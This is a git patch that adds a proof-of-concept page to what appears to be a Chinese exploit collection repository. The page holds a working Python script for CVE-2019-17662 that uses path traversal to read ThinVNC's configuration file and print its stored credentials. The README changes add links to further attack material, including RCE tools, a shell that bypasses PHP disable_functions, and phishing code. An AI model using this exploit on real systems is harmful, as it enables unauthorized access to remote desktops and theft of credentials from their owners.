From fadc625bad4cf61ddad76e184ff68d040e4e11b6 Mon Sep 17 00:00:00 2001 From: mr-xn Date: Thu, 17 Oct 2019 21:52:06 +0800 Subject: [PATCH] add CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass --- ...2-ThinVNC 1.0b1 - Authentication Bypass.md | 51 +++++++++++++++++++ README.md | 2 + 2 files changed, 53 insertions(+) create mode 100644 CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md diff --git a/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md b/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md new file mode 100644 index 0000000..56286de --- /dev/null +++ b/CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass.md @@ -0,0 +1,51 @@ +## ThinVNC 1.0b1 - Authentication Bypass + +## 简介 + +ThinVNC是一款基于HTML5和AJAX的远程桌面实现 + +## POC + +```python +# Exploit Title: ThinVNC 1.0b1 - Authentication Bypass +# Date: 2019-10-17 +# Exploit Author: Nikhith Tumamlapalli +# Contributor WarMarX +# Vendor Homepage: https://sourceforge.net/projects/thinvnc/ +# Software Link: https://sourceforge.net/projects/thinvnc/files/ThinVNC_1.0b1/ThinVNC_1.0b1.zip/download +# Version: 1.0b1 +# Tested on: Windows All Platforms +# CVE : CVE-2019-17662 + +# Description: +# Authentication Bypass via Arbitrary File Read + +#!/usr/bin/python3 + +import sys +import os +import requests + +def exploit(host,port): + url = "http://" + host +":"+port+"/xyz/../../ThinVnc.ini" + r = requests.get(url) + body = r.text + print(body.splitlines()[2]) + print(body.splitlines()[3]) + + + +def main(): + if(len(sys.argv)!=3): + print("Usage:\n{} \n".format(sys.argv[0])) + print("Example:\n{} 192.168.0.10 5888") + else: + port = sys.argv[2] + host = sys.argv[1] + exploit(host,port) + +if __name__ == '__main__': + main() + +``` + diff --git a/README.md b/README.md index b35951d..21b74aa 100644 --- a/README.md +++ b/README.md @@ -74,6 +74,7 @@ - [Joomla-3.4.6-RCE](./Joomla-3.4.6-RCE.md) - [Easy File Sharing Web Server 7.2 - GET 缓冲区溢出 (SEH)](./Easy%20File%20Sharing%20Web%20Server%207.2%20-%20GET%20缓冲区溢出%20(SEH).md) - [构建ASMX绕过限制WAF达到命令执行(适用于ASP.NET环境)](./构建ASMX绕过限制WAF达到命令执行.md) +- [CVE-2019-17662-ThinVNC 1.0b1 - Authentication Bypass](./CVE-2019-17662-ThinVNC%201.0b1 - Authentication%20Bypass.md) ## 提权辅助相关 @@ -97,6 +98,7 @@ - [python2的socks代理](./tools/s5.py) - [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md) - [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md) +- [一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell) - [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md) - [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt) - [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py)